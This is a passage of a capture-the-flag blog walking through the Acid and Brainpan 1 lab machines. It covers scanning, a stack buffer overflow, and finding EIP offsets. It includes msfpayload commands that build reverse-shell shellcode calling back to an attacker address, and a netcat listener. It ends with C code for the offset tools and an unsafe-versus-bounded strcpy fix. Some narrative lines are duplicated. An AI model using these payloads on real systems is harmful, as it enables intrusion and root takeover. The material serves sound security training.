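    string is the check that the assumed layout holds."""
    encoded = [(v + "\x00").encode("utf-16-le") for v in values]
    body = b"".join(struct.pack("<I", len(p)) + p for p in encoded)
    return base64.b64encode(struct.pack("<I", len(values)) + body).decode("ascii")


def printable_view(b64_text):
    """What `base64 -d` leaves on a terminal: the header bytes are unprintable
    and every other byte of the text is NUL, so only N.o.o.B.@.1.2.3 shows."""
    raw = base64.b64decode(b64_text, validate=True)
    return "".join(chr(b) if 32 <= b < 127 else "." for b in raw)


if __name__ == "__main__":
    print(decode_mv_unicode_prop(PAGE_BLOB_B64))   # ['NooB@123']
    print(printable_view(PAGE_BLOB_B64))
    print(encode_mv_unicode_prop(["NooB@123"]) == PAGE_BLOB_B64)
```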
Unfortunately, Avinash with NooB@123 is not a valid credential. So let's try makke, and voilà!
We have got:
makke@acid:~$ cat .bash_history
exit
cd ..
clear
cd /
ls
cd bin/
clear
./overlayfs
clear
cd /home/makke/
clear
nano .hint
clear
ls
clear
ls
ls -a
cat .hint
clear
cd /bin/
ls
./overlayfs
clear
wgt
wget
apt-get remove wget
su
su -
exit

Let's move to /bin/ and....
Wow, we have got root! This was not as hard as I thought :-)
Tuesday, 2 February 2016
Brain Pa(i)n
Now it's time for a little Buffer Overflow.
After sending this part of the payload, we can see in Immunity Debugger that everything is fine. Now we generate our shellcode.
Nice! We should generate a new payload for our Linux target machine.
We have a limited shell!
I verified that the kernel of our target is not vulnerable to any known exploit :-(, but look at something interesting:
Have you thought about Buffer Overflow again? Executing:
We can see that we have no result for JMP ESP, but we have two records for CALL EAX. OK! Then we expect that validate is vulnerable to Buffer Overflow.
Excellent! We know 200 A's overflow our binary!
Amazing! We can determine "where" the EIP register is.
Now we can generate shellcode and replace the A's with it. Finally we are able to use our exploit and ... BOOM!
We have changed our privileges! TRY HARDER!
Game over!
root@osboxes:~# nmap -sn 192.168.1.0/24
Nmap scan report for 192.168.1.110
Host is up (0.00039s latency).
MAC Address: 00:0C:29:10:01:C0 (VMware)

Now enumerating services...
root@osboxes:~# nmap -sV 192.168.1.110
Starting Nmap 6.47 ( http://nmap.org ) at 2016-02-01 20:23 GMT
Nmap scan report for 192.168.1.110
Host is up (0.0014s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
9999/tcp open abyss?
10000/tcp open http SimpleHTTPServer 0.6 (Python 2.7.3)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
MAC Address: 00:0C:29:10:01:C0 (VMware)

Let's browse the web application. Only trash information :-) Now turn to dirbuster (as always).

Oh! There may be some binary file in the bin directory?

http://192.168.1.110:10000/bin/
I think we should run our Windows 32-bit VM and download brainpan.exe to it. Probably brainpan.exe is running on our target on port 9999.
I am pretty sure it will be a good idea to run brainpan.exe via Immunity Debugger.
Our Windows VM has the IP address 191.168.1.101. We have to click the Start button twice.
My own fuzzer
Result:
We know that for us the Stack has three addresses: EAX, EIP and ESP. We have to find where EIP is located. We verified that 900 A's cause an overflow. We have overwritten it with 4x"A", so:

root@osboxes:~/brainpan1# ruby /usr/share/metasploit-framework/tools/pattern_create.rb 900

and we have to edit our script using the output of the above command. Executing our script, we got the following result:
We can see, that EIP has been overwritten via 35724134
root@osboxes:~/brainpan1# ruby /usr/share/metasploit-framework/tools/pattern_offset.rb 35724134Great! Now our payload will be as follow "A"*524 + "B"*4 + (900-524-4)*"C". Updated script gives following result:
[*] Exact match at offset 524
Excellent! We know where we should set up JMP ESP address and where our shellcode.
root@osboxes:/usr/share/metasploit-framework/tools# ./nasm_shell.rb
nasm > jmp esp
00000000 FFE4 jmp esp
OK! We also found a module without ASLR protection.
!mona find -s "\xff\xe4" -m brainpan.exe
Now we have found our JMP ESP address: 311712F3.
So, our payload will be as follows: "A"*524+"\xf3\x12\x17\x31"+(900-524-4)*"C".
We also have to check for "bad characters", so let's generate all possible hex values.
root@osboxes:~/brainpan1# cat hex.py
hexdigits = "abcdef0123456789"
# print every byte value as a \xNN escape, one per line
for i in hexdigits:
    for j in hexdigits:
        print("\\x" + i + j)
Our temporary payload: "A"*524 + "B"*4 + (900-524-4-int(len(tail)))*"\x90" + tail, where
tail:
\xaa\xab\xac\xad\xae\xaf\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xba\xbb\xbc\xbd\xbe\xbf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xca\xcb\xcc\xcd\xce\xcf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xda\xdb\xdc\xdd\xde\xdf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xea\xeb\xec\xed\xee\xef\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xfa\xfb\xfc\xfd\xfe\xff\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\x0a\x0b\x0c\x0d\x0e\x0f\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x1a\x1b\x1c\x1d\x1e\x1f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x2a\x2b\x2c\x2d\x2e\x2f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x3a\x3b\x3c\x3d\x3e\x3f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x4a\x4b\x4c\x4d\x4e\x4f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x5a\x5b\x5c\x5d\x5e\x5f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x6a\x6b\x6c\x6d\x6e\x6f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x7a\x7b\x7c\x7d\x7e\x7f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x8a\x8b\x8c\x8d\x8e\x8f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x9b\x9c\x9d\x9e\x9f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99
First of all we should remove \x00 (the null byte, which breaks everything after it) and \x90 (No Operation, which does nothing) from our payload.
After sending this part of the payload, we can see in Immunity Debugger that everything is fine. Now we generate our shellcode:
root@osboxes:~/brainpan1# msfpayload windows/shell_reverse_tcp LPORT=4444 LHOST=192.168.1.104 R | msfencode -e x86/shikata_ga_nai -b "\x00"
We have to replace tail with the generated buf, run
root@osboxes:~/brainpan1# nc -nlvp 4444
and execute our script.
Nice! Now we should generate a new payload for our Linux target machine.
root@osboxes:~/brainpan1# msfpayload linux/x86/shell_reverse_tcp LPORT=4444 LHOST=192.168.1.104 R | msfencode -e x86/shikata_ga_nai -b "\x00"
Execute our script and BOOM!
We have got a limited shell!
I verified that the kernel of our target is not vulnerable to any known exploit :-(, but look at something interesting:
puck@brainpan:/$ find / -perm -4000 -type f
[...]
/usr/sbin/pppd
/usr/local/bin/validate
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/pt_chown
find: `/lost+found': Permission denied
[...]
OK, let's examine /usr/local/bin/validate.
Have you thought about Buffer Overflow again? Executing
sudo -l
we see that we don't have any "extra" privileges. I downloaded the validate file to our machine via netcat.
We can see that there is no result for JMP ESP, but there are two records for CALL EAX. OK! So we expect that validate is vulnerable to Buffer Overflow.
Excellent! We know that 200 A's overflow our binary!
root@osboxes:~/brainpan1# ruby /usr/share/metasploit-framework/tools/pattern_create.rb 200
Amazing! We can determine where the EIP register is.
root@osboxes:~/brainpan1# ruby /usr/share/metasploit-framework/tools/pattern_offset.rb 39644138
[*] Exact match at offset 116
Our payload will look as in the screenshot below.
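How pattern_create.rb and pattern_offset.rb arrive at the two offsets used in this walkthrough, 524 for brainpan.exe (EIP 35724134 after a 900-byte pattern) and 116 for validate (EIP 39644138 after a 200-byte pattern): an added C reimplementation of the cyclic pattern written for this page, not Metasploit's own code. It assumes a 32-bit little-endian EIP value and a pattern that contains no NUL bytes.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Fill out[] with len bytes of the cyclic pattern "Aa0Aa1...Aa9Ab0...":
 * every position is an (upper, lower, digit) triple, so each 4-byte window
 * is unique within the first 20280 bytes. out needs len + 1 bytes of room. */
size_t pattern_create(char *out, size_t len) {
    size_t n = 0;
    for (int u = 'A'; u <= 'Z' && n < len; u++)
        for (int l = 'a'; l <= 'z' && n < len; l++)
            for (int d = '0'; d <= '9' && n < len; d++) {
                const char triple[3] = { (char)u, (char)l, (char)d };
                for (int i = 0; i < 3 && n < len; i++)
                    out[n++] = triple[i];
            }
    out[n] = '\0';
    return n;
}

/* Given the EIP value the debugger showed after the crash and the pattern
 * length that was sent, return the offset of those four bytes inside the
 * pattern, or -1 if EIP did not come from the pattern. x86 is
 * little-endian, so the low byte of EIP is the first byte of the window. */
long pattern_offset(uint32_t eip, size_t len) {
    char needle[5];
    for (int i = 0; i < 4; i++)
        needle[i] = (char)((eip >> (8 * i)) & 0xffu);
    needle[4] = '\0';
    if (memchr(needle, '\0', 4) != NULL)   /* the pattern has no NUL bytes */
        return -1;
    char *pattern = malloc(len + 1);
    if (pattern == NULL)
        return -1;
    pattern_create(pattern, len);
    const char *hit = strstr(pattern, needle);
    long offset = hit ? (long)(hit - pattern) : -1;
    free(pattern);
    return offset;
}

int main(void) {
    /* The two crashes from the walkthrough: a 900-byte pattern sent to
     * brainpan.exe and a 200-byte pattern passed to validate. */
    printf("brainpan.exe: offset %ld\n", pattern_offset(0x35724134u, 900));
    printf("validate:     offset %ld\n", pattern_offset(0x39644138u, 200));
    return 0;
}
```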
Now we can generate shellcode and replace the A's with it. Finally we are able to run our exploit and ... BOOM!
We have changed our privileges! TRY HARDER!
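A constructed C example, not the validate binary from the VM, of the defect that a root SUID binary with an EIP overwrite at a fixed offset implies, next to the bounded version that cannot be overflowed; BUF_SIZE, EXPECTED and the helper check_run_of_As are hypothetical.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUF_SIZE 100                    /* hypothetical stack buffer size */
static const char EXPECTED[] = "hypothetical-password";

/* Unsafe: strcpy copies until the NUL, so an input longer than BUF_SIZE
 * runs past buf and over the saved return address; 200 A's is exactly
 * the crash the walkthrough triggers. */
int validate_unsafe(const char *input) {
    char buf[BUF_SIZE];
    strcpy(buf, input);
    return strcmp(buf, EXPECTED) == 0;
}

/* Safe: look for the terminator within BUF_SIZE bytes before copying and
 * reject the input if it is not there. Returns 1 on match, 0 on
 * mismatch, -1 when the input does not fit the buffer. */
int validate_safe(const char *input) {
    char buf[BUF_SIZE];
    const char *end = memchr(input, '\0', sizeof buf);
    if (end == NULL)
        return -1;
    memcpy(buf, input, (size_t)(end - input) + 1);
    return strcmp(buf, EXPECTED) == 0;
}

/* Mirror the walkthrough's test against the bounded version: feed len
 * bytes of 'A' and return its verdict (-2 only if malloc fails). */
int check_run_of_As(size_t len) {
    char *input = malloc(len + 1);
    if (input == NULL)
        return -2;
    memset(input, 'A', len);
    input[len] = '\0';
    int r = validate_safe(input);
    free(input);
    return r;
}

int main(int argc, char **argv) {
    if (argc != 2) return 2;
    int r = validate_safe(argv[1]);
    if (r < 0) { fputs("input rejected: longer than the buffer\n", stderr); return 2; }
    puts(r == 1 ? "password ok" : "password rejected");
    return r == 1 ? 0 : 1;
}
```

The length check is the fix; building the binary with -fstack-protector-strong, PIE and a non-executable stack is the second layer that turns a missed check into a crash instead of a root shell.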
Game over!